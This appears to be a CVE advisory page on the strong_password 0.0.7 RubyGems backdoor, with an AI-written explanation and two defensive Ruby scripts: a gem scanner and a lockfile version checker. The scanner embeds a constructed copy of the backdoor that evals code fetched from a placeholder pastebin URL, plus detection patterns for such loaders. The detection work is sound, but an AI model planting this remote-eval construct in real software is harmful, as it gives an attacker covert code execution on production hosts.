VYPR
Critical severity · NVD Advisory · Published Jul 8, 2019 · Updated Aug 4, 2024

CVE-2019-13354

Description

The strong_password gem 0.0.7 on RubyGems.org contained a remote code execution backdoor inserted by an attacker, compromising any application using that version.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vulnerability Details

Version 0.0.7 of strong_password, as published on RubyGems.org, carried a backdoor injected by a third party who had obtained the gem's publishing credentials. The legitimate GitHub repository was never modified; the malicious code existed only in the package on RubyGems, which means a diff of the installed gem against the repository source exposes it. The injection was a few lines appended to lib/strong_password/strength_checker.rb: terse, deliberately unreadable code whose only job was to fetch and evaluate Ruby code from a remote location [2][3].

Exploitation Mechanism

The appended code first defines a tiny helper that runs a block and swallows every exception it raises, so network failures or syntax errors in the fetched payload never surface in the application's logs. Inside that helper it spawns a Ruby thread that loops forever: each iteration sleeps for a random period of up to roughly an hour, then fetches Ruby source from a pastebin.com URL with Net::HTTP.get and passes the response straight to eval. The whole construct is guarded by Rails.env[0] == "p", so it runs only when the Rails environment name begins with "p", which in practice means production. Development, test and CI environments never trigger it, and the random delay means the outbound request does not coincide with application start-up, both of which made the behaviour markedly harder to notice [3].
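The loader described above has a recognisable shape, and one practical response is to look for that shape in every gem installed on a host rather than only in the one gem named here. The following Ruby is an added example written for this page, not code from the gem or from the advisory; the backdoored sample it scans is constructed to mimic the published description (the payload URL in it is a placeholder, not the real one), and the indicator regexes and the two-indicator threshold are the author's own choices.

```ruby
# Added example (not the gem's or the advisory's code): a heuristic scanner for
# the remote-eval backdoor pattern. It reports a file only when several of the
# indicators the loader relied on appear together, because Thread.new or
# Net::HTTP.get on their own are ordinary Ruby.

require "rubygems"

# Each indicator is one feature of the loader described on this page.
INDICATORS = {
  remote_eval:     /\beval\s*\(?\s*(Net::HTTP\.get|open\s*\(|URI\.open|Kernel\.open)/,
  env_guard:       /Rails\.env\[0\]\s*==\s*["']p["']/,
  background_loop: /Thread\.new\s*\{.*loop\s*\{/m,
  random_sleep:    /sleep\s+rand/,
  swallow_errors:  /rescue\s+Exception\s*;?\s*end/,
  paste_site:      %r{https?://(pastebin\.com|hastebin\.com|gist\.githubusercontent\.com)/},
}.freeze

# Scan one file's source; returns the names of the indicators that matched.
def backdoor_indicators(source)
  INDICATORS.select { |_, re| source.match?(re) }.keys
end

# Two or more indicators in one file is the (author-chosen) reporting threshold.
def suspicious?(source, min_indicators: 2)
  backdoor_indicators(source).size >= min_indicators
end

# Walk every gem known to the local RubyGems installation and return
# { path => [indicators] } for files that cross the threshold.
def scan_installed_gems(min_indicators: 2)
  hits = {}
  Gem::Specification.each do |spec|
    Dir.glob(File.join(spec.full_gem_path, "lib", "**", "*.rb")).each do |path|
      found = backdoor_indicators(File.read(path, encoding: "UTF-8").scrub)
      hits[path] = found if found.size >= min_indicators
    end
  end
  hits
end

# Constructed sample with the shape of the 0.0.7 injection appended to an
# otherwise ordinary file. The URL is a placeholder, not the real payload host.
BACKDOORED_SAMPLE = <<~'RUBY'
  module StrongPassword
    class StrengthChecker
      def is_strong?(weak_words = [])
        true
      end
    end
  end
  def _!;begin;yield;rescue Exception;end;end
  _!{Thread.new{loop{_!{sleep rand*3333;eval(Net::HTTP.get(URI('https://pastebin.example/raw/PLACEHOLDER')))}}} if Rails.env[0]=="p"}
RUBY

# Constructed benign sample: a thread and an HTTP fetch, but no eval of the result.
CLEAN_SAMPLE = <<~'RUBY'
  require "net/http"
  module StrongPassword
    class StrengthChecker
      def is_strong?(weak_words = [])
        Thread.new { Net::HTTP.get(URI("https://example.invalid/")) }
        true
      end
    end
  end
RUBY

if __FILE__ == $0
  puts "backdoored sample: #{backdoor_indicators(BACKDOORED_SAMPLE).inspect}"
  puts "clean sample:      #{backdoor_indicators(CLEAN_SAMPLE).inspect}"
  scan_installed_gems.each { |path, found| puts "#{path}: #{found.join(', ')}" }
end
```

Running the file prints the indicators matched by each sample and then walks the local gem set. The threshold is what keeps this usable: a single match is noise, but eval of fetched content sitting next to a production-only guard, a random sleep and a blanket rescue is not something a legitimate password-strength library has any reason to contain.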

Impact and Consequences

Because the loop evaluated whatever Ruby the pastebin URL returned, whoever controlled that paste could run arbitrary code, with the privileges of the application process, on every production host that loaded the gem. That is sufficient for full server compromise, data exfiltration, credential theft and lateral movement into the rest of the infrastructure. Keeping the payload external rather than inside the gem meant it could be changed at any time without publishing a new version, and the gem itself contained nothing that named a specific malicious action [3][4].

Mitigation Status

Applications pinned to 0.0.7 should move immediately to 0.0.8 or later, the first clean release, or downgrade to 0.0.6, which predates the injection. The malicious 0.0.7 has been removed from RubyGems.org, and no other version of the gem was compromised [1][2][3]. Upgrading removes the loader but not the effects of any payload it already fetched and ran: a host that ran 0.0.7 in a production environment should be treated as potentially compromised, with credentials and secrets available to that process rotated.
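Whether an application actually pinned the affected release is a lockfile question, and the version comparison is best done with RubyGems' own classes rather than string matching. The Ruby below is an added example for this page, not tooling from the advisory or the gem; the lockfile excerpt is constructed, and the ADVISORY table encodes only the affected range and patched version shown in the Affected packages section.

```ruby
# Added example (not the advisory's tooling): check a Gemfile.lock against the
# affected range for CVE-2019-13354 using Gem::Requirement, so prerelease and
# platform-suffixed versions compare the same way Bundler compares them.

require "rubygems"

# Advisory data as shown on this page: affected >= 0.0.7, < 0.0.8; fixed in 0.0.8.
ADVISORY = {
  "strong_password" => {
    cve:      "CVE-2019-13354",
    affected: Gem::Requirement.new(">= 0.0.7", "< 0.0.8"),
    fixed:    Gem::Version.new("0.0.8"),
  },
}.freeze

# Pull "name (version)" pairs out of the specs: section(s) of a lockfile.
# Returns { "name" => Gem::Version }. Resolved gems sit at four spaces of
# indent; their dependency lines (six spaces, range constraints) are skipped,
# as is everything outside a specs: block (DEPENDENCIES, PLATFORMS, ...).
def lockfile_versions(lockfile_text)
  versions = {}
  in_specs = false
  lockfile_text.each_line do |line|
    if line =~ /\A  specs:\s*\z/
      in_specs = true
      next
    end
    in_specs = false if line =~ /\A\S/ # a new top-level section begins
    next unless in_specs
    if (m = line.match(/\A    (\S+) \(([^)\s]+)\)/))
      versions[m[1]] = Gem::Version.new(m[2])
    end
  end
  versions
end

# Return one finding per pinned gem whose version falls inside an advisory range.
def vulnerable_gems(lockfile_text)
  lockfile_versions(lockfile_text).filter_map do |name, version|
    adv = ADVISORY[name]
    next unless adv && adv[:affected].satisfied_by?(version)
    { gem: name, version: version.to_s, cve: adv[:cve], fixed_in: adv[:fixed].to_s }
  end
end

# Constructed lockfile excerpt (not taken from a real application).
SAMPLE_LOCK = <<~LOCK
  GEM
    remote: https://rubygems.org/
    specs:
      rails (5.2.3)
        activesupport (= 5.2.3)
      strong_password (0.0.7)

  PLATFORMS
    ruby

  DEPENDENCIES
    rails
    strong_password

  BUNDLED WITH
     2.0.2
LOCK

if __FILE__ == $0
  text = ARGV[0] ? File.read(ARGV[0]) : SAMPLE_LOCK
  findings = vulnerable_gems(text)
  findings.each do |f|
    puts "#{f[:gem]} #{f[:version]} is affected by #{f[:cve]}; fixed in #{f[:fixed_in]}"
  end
  puts "no affected gems found" if findings.empty?
end
```

Pass a path to run it against a real Gemfile.lock; with no argument it checks the constructed sample. Note that the DEPENDENCIES section lists names without versions, which is why only the specs: block is parsed: the resolved version there is what Bundler actually installs.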

AI Insight generated on May 22, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

Package: strong_password (RubyGems)
Affected versions: >= 0.0.7, < 0.0.8
Patched versions: 0.0.8
